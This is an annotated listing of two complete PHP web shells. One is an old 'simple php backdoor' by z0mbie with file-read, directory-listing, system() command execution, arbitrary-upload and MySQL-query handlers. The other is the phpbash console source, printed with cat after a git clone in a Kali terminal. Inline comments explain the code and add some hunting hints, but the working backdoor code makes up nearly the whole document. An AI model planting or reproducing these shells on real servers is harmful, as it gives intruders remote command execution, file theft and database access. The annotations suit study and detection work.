- <?
- // a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
- ob_implicit_flush(); // Turns on implicit flushing, so each handler's output is sent to the client as it is produced.
- if(isset($_REQUEST['f'])){ // File-read handler: runs whenever request parameter `f` is present (GET or POST; cookies too, depending on request_order).
- $filename=$_REQUEST['f']; // Path is taken straight from the request; nothing in this block validates or restricts it.
- $file=fopen("$filename","rb");
- fpassthru($file); // Streams the whole file into the HTTP response, so any file readable by the PHP process can be disclosed.
- die; // Ends the request here, so the HTML forms further down are not appended to the file contents.
- }
- if(isset($_REQUEST['d'])){ // Directory-browse handler: runs whenever request parameter `d` is present.
- $d=$_REQUEST['d']; // Directory path taken from the request without validation.
- echo "<pre>";
- if ($handle = opendir("$d")) {
- echo "<h2>listing of $d</h2>";
- while ($dir = readdir($handle)){
- if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>"; // Sub-directories link back to this handler. $PHP_SELF is never assigned in this file; presumably it relies on register_globals (legacy PHP).
- else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>"; // Regular files link to the file-read handler (parameter `f`).
- echo "$dir\n";
- echo "</font></a>";
- }
- } else echo "opendir() failed";
- closedir($handle);
- die ("<hr>"); // Ends the request after the listing.
- }
- if(isset($_REQUEST['c'])){ // Command handler: runs whenever request parameter `c` is present.
- echo "<pre>";
- system($_REQUEST['c']); // The request value is handed unmodified to system(): OS command execution with the privileges of the PHP process, output echoed into the response.
- die; // Hunting leads: a `c=` parameter on requests to a .php file in access logs, and PHP/web-server workers spawning shell processes.
- }
- if(isset($_REQUEST['upload'])){ // Upload handler: runs whenever request parameter `upload` is present (the name of the submit button in the upload form of this page).
- if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
- else $dir=$_REQUEST['dir']; // Destination directory is chosen by the client.
- $fname=$HTTP_POST_FILES['file_name']['name']; // Client-supplied file name, used as-is by this code. $HTTP_POST_FILES is the legacy long-array form of $_FILES.
- if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname)) // Target is $dir.$fname with no separator added and no extension or path checks: a file write to wherever the PHP process may write.
- die('file uploading error.');
- } // No die on success: execution falls through to the handlers and forms that follow.
- if(isset($_REQUEST['mquery'])){ // SQL handler: runs whenever request parameter `mquery` is present.
- $host=$_REQUEST['host']; // Server, account, password, database and statement all come from the request,
- $usr=$_REQUEST['usr']; // so the page acts as a generic MySQL client for whoever can reach it.
- $passwd=$_REQUEST['passwd']; // The matching form on this page uses GET, so submitted credentials appear in URLs and can surface in access logs.
- $db=$_REQUEST['db'];
- $mquery=$_REQUEST['mquery'];
- mysql_connect("$host", "$usr", "$passwd") or // mysql_* is the legacy ext/mysql API, removed in PHP 7.0.
- die("Could not connect: " . mysql_error());
- mysql_select_db("$db");
- $result = mysql_query("$mquery"); // Executes the request-supplied statement verbatim.
- if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
- while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row); // Dumps every returned row into the response.
- mysql_free_result($result);
- die;
- }
- ?>
- <pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
- <form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
- upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir"> <input type="submit" name="upload" value="upload"></form>
- <hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
- <br>for example:
- http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
- or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
- <hr>execute mysql query:
- <form action="<? echo $PHP_SELF; ?>" METHOD=GET >
- host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
- database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
- </form>
- <!-- http://michaeldaw.org 2006 -->
- root@kali:~/IDF# git clone https://github.com/Arrexel/phpbash.git
- Cloning into 'phpbash'...
- remote: Enumerating objects: 85, done.
- remote: Total 85 (delta 0), reused 0 (delta 0), pack-reused 85
- Unpacking objects: 100% (85/85), done.
- root@kali:~/IDF# ls
- Bing.url credenitals.txt decrypt.rar hash README.txt
- c2.pcap.rar d2.rar.rar decrypt.rar.rar new run
- Challenge2 d3.rar dec.txt newfile shell.php
- Challenge2.pcap.rar '#decrypt.py#' desktop.ini p0wny-shell WebExploitationTool
- classified_document.txt decrypt.py file phpbash work
- root@kali:~/IDF# cd ph
- bash: cd: ph: No such file or directory
- root@kali:~/IDF# cd phpbash/
- root@kali:~/IDF/phpbash# ls
- LICENSE phpbash.min.php phpbash.php README.md
- root@kali:~/IDF/phpbash# cat phpbash.php
- <?php
- /* phpbash by Alexander Reid (Arrexel) */
- if (ISSET($_POST['cmd'])) { // Command endpoint: any POST carrying `cmd` is executed; no authentication check is visible in this listing.
- $output = preg_split('/[\n]/', shell_exec($_POST['cmd']." 2>&1")); // Passes the POSTed string to the shell with stderr merged into stdout, then splits the output into lines.
- foreach ($output as $line) {
- echo htmlentities($line, ENT_QUOTES | ENT_HTML5, 'UTF-8') . "<br>"; // Each line is HTML-escaped and terminated with <br>; the page script splits responses on that marker.
- }
- die(); // Only the command output is returned, not the HTML console.
- } else if (!empty($_FILES['file']['tmp_name']) && !empty($_POST['path'])) { // Upload endpoint: multipart POST with a `file` part and a non-empty `path` field.
- $filename = $_FILES["file"]["name"]; // Client-supplied name, used as-is by this code.
- $path = $_POST['path']; // Client-supplied destination directory.
- if ($path != "/") {
- $path .= "/";
- }
- if (move_uploaded_file($_FILES["file"]["tmp_name"], $path.$filename)) { // No type, extension or location checks: a file write to any directory the PHP process may write to.
- echo htmlentities($filename) . " successfully uploaded to " . htmlentities($path);
- } else {
- echo "Error uploading " . htmlentities($filename);
- }
- die();
- }
- ?>
- <html>
- <head>
- <title></title>
- <style>
- html, body {
- max-width: 100%;
- }
- body {
- width: 100%;
- height: 100%;
- margin: 0;
- background: #000;
- }
- body, .inputtext {
- font-family: "Lucida Console", "Lucida Sans Typewriter", monaco, "Bitstream Vera Sans Mono", monospace;
- font-size: 14px;
- font-style: normal;
- font-variant: normal;
- font-weight: 400;
- line-height: 20px;
- overflow: hidden;
- }
- .console {
- width: 100%;
- height: 100%;
- margin: auto;
- position: absolute;
- color: #fff;
- }
- .output {
- width: auto;
- height: auto;
- position: absolute;
- overflow-y: scroll;
- top: 0;
- bottom: 30px;
- left: 5px;
- right: 0;
- line-height: 20px;
- }
- .input form {
- position: relative;
- margin-bottom: 0px;
- }
- .username {
- height: 30px;
- width: auto;
- padding-left: 5px;
- line-height: 30px;
- float: left;
- }
- .input {
- border-top: 1px solid #333333;
- width: 100%;
- height: 30px;
- position: absolute;
- bottom: 0;
- }
- .inputtext {
- width: auto;
- height: 30px;
- bottom: 0px;
- margin-bottom: 0px;
- background: #000;
- border: 0;
- float: left;
- padding-left: 8px;
- color: #fff;
- }
- .inputtext:focus {
- outline: none;
- }
- ::-webkit-scrollbar {
- width: 12px;
- }
- ::-webkit-scrollbar-track {
- background: #101010;
- }
- ::-webkit-scrollbar-thumb {
- background: #303030;
- }
- </style>
- </head>
- <body>
- <div class="console">
- <div class="output" id="output"></div>
- <div class="input" id="input">
- <form id="form" method="GET" onSubmit="sendCommand()">
- <div class="username" id="username"></div>
- <input class="inputtext" id="inputtext" type="text" name="cmd" autocomplete="off" autofocus>
- </form>
- </div>
- </div>
- <form id="upload" method="POST" style="display: none;">
- <input type="file" name="file" id="filebrowser" onchange='uploadFile()' />
- </form>
- <script type="text/javascript">
- var username = ""; // Prompt fields; filled from the first server response by getShellInfo().
- var hostname = "";
- var currentDir = ""; // Working directory tracked on the client; the server side keeps no state between requests in this listing.
- var previousDir = ""; // Used for "cd -".
- var defaultDir = ""; // Directory reported by the first response; used for a bare "cd".
- var commandHistory = []; // Commands typed in this page session (arrow-key recall).
- var currentCommand = 0; // Index into commandHistory.
- var inputTextElement = document.getElementById('inputtext');
- var inputElement = document.getElementById("input");
- var outputElement = document.getElementById("output");
- var usernameElement = document.getElementById("username");
- var uploadFormElement = document.getElementById("upload");
- var fileBrowserElement = document.getElementById("filebrowser");
- getShellInfo(); // Runs as soon as the script loads: the first command request is sent without any user input.
- function getShellInfo() { // Page-load bootstrap: asks the server endpoint for user, host and working directory and draws the prompt from the reply.
- var request = new XMLHttpRequest();
- request.onreadystatechange = function() {
- if (request.readyState == XMLHttpRequest.DONE) {
- var parsedResponse = request.responseText.split("<br>"); // The server terminates each output line with <br>.
- username = parsedResponse[0];
- hostname = parsedResponse[1];
- currentDir = parsedResponse[2].replace(new RegExp("/", "g"), "/"); // As shown this replaces "/" with "/" (a no-op); possibly an HTML entity in the pattern was decoded when the page was rendered.
- defaultDir = currentDir;
- usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
- updateInputWidth();
- }
- };
- request.open("POST", "", true); // Empty URL: the request goes back to the page's own address.
- request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- request.send("cmd=whoami; hostname; pwd"); // Fixed first request body: a stable string to search for in captured POST bodies or WAF logs.
- }
- function sendCommand() { // Form-submit handler: wraps the typed line with the tracked working directory, POSTs it as `cmd`, and appends the reply to the console.
- var request = new XMLHttpRequest();
- var command = inputTextElement.value;
- var originalCommand = command;
- var originalDir = currentDir;
- var cd = false;
- commandHistory.push(originalCommand);
- switchCommand(commandHistory.length);
- inputTextElement.value = "";
- var parsedCommand = command.split(" ");
- if (parsedCommand[0] == "cd") { // "cd" is emulated: the directory is kept on the client and re-applied on every request.
- cd = true;
- if (parsedCommand.length == 1) {
- command = "cd "+defaultDir+"; pwd";
- } else if (parsedCommand[1] == "-") {
- command = "cd "+previousDir+"; pwd";
- } else {
- command = "cd "+currentDir+"; "+command+"; pwd";
- }
- } else if (parsedCommand[0] == "clear") { // Handled in the browser only; nothing is sent to the server.
- outputElement.innerHTML = "";
- return false;
- } else if (parsedCommand[0] == "upload") { // Opens the hidden file picker; the transfer itself is done by uploadFile().
- fileBrowserElement.click();
- return false;
- } else {
- command = "cd "+currentDir+"; " + command; // Every other command goes out prefixed with "cd <dir>; ", so request bodies start with cmd=cd%20 once URL-encoded.
- }
- request.onreadystatechange = function() {
- if (request.readyState == XMLHttpRequest.DONE) {
- if (cd) {
- var parsedResponse = request.responseText.split("<br>");
- previousDir = currentDir;
- currentDir = parsedResponse[0].replace(new RegExp("/", "g"), "/"); // Same no-op-looking replace as in getShellInfo(); the first reply line becomes the new directory.
- outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+originalDir+"# "+originalCommand+"</div><br>";
- usernameElement.innerHTML = "<div style='color: #ff0000; display: inline;'>"+username+"@"+hostname+"</div>:"+currentDir+"#";
- } else {
- outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# "+originalCommand+"</div><br>" + request.responseText.replace(new RegExp("<br><br>$"), "<br>");
- outputElement.scrollTop = outputElement.scrollHeight;
- }
- updateInputWidth();
- }
- };
- request.open("POST", "", true); // Posts to the page's own URL.
- request.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
- request.send("cmd="+encodeURIComponent(command)); // The command travels in the POST body, so it is absent from access logs that record only the request line.
- return false;
- }
- function uploadFile() { // onchange handler of the hidden file input: sends the chosen file plus the tracked working directory to the server upload branch.
- var formData = new FormData();
- formData.append('file', fileBrowserElement.files[0], fileBrowserElement.files[0].name);
- formData.append('path', currentDir); // Destination is whatever directory the console is currently in.
- var request = new XMLHttpRequest();
- request.onreadystatechange = function() {
- if (request.readyState == XMLHttpRequest.DONE) {
- outputElement.innerHTML += request.responseText+"<br>";
- }
- };
- request.open("POST", "", true); // multipart/form-data POST to the page's own URL, with parts named `file` and `path`.
- request.send(formData);
- outputElement.innerHTML += "<div style='color:#ff0000; float: left;'>"+username+"@"+hostname+"</div><div style='float: left;'>"+":"+currentDir+"# Uploading "+fileBrowserElement.files[0].name+"...</div><br>";
- }
- function updateInputWidth() { // Layout only: sizes the text box to the space left beside the prompt.
- inputTextElement.style.width = inputElement.clientWidth - usernameElement.clientWidth - 15;
- }
- document.onkeydown = checkForArrowKeys; // Page-wide key handler for history recall.
- function checkForArrowKeys(e) { // Up arrow (38) recalls the previous history entry, down arrow (40) the next one.
- e = e || window.event;
- if (e.keyCode == '38') {
- previousCommand();
- } else if (e.keyCode == '40') {
- nextCommand();
- }
- }
- function previousCommand() { // Steps one entry back in commandHistory unless already at the first entry.
- if (currentCommand != 0) {
- switchCommand(currentCommand-1);
- }
- }
- function nextCommand() { // Steps one entry forward; index commandHistory.length stands for the empty input line.
- if (currentCommand != commandHistory.length) {
- switchCommand(currentCommand+1);
- }
- }
- function switchCommand(newCommand) { // Moves the history cursor to newCommand and shows that entry (or an empty line) in the input box.
- currentCommand = newCommand;
- if (currentCommand == commandHistory.length) {
- inputTextElement.value = "";
- } else {
- inputTextElement.value = commandHistory[currentCommand];
- setTimeout(function(){ inputTextElement.selectionStart = inputTextElement.selectionEnd = 10000; }, 0); // Deferred so the caret lands at the end of the recalled text.
- }
- }
- document.getElementById("form").addEventListener("submit", function(event){ // Cancels the native form submission (the form is declared method="GET"), so commands go out only via the POST in sendCommand(), not in the URL.
- event.preventDefault()
- });
- </script>
- </body>
- </html>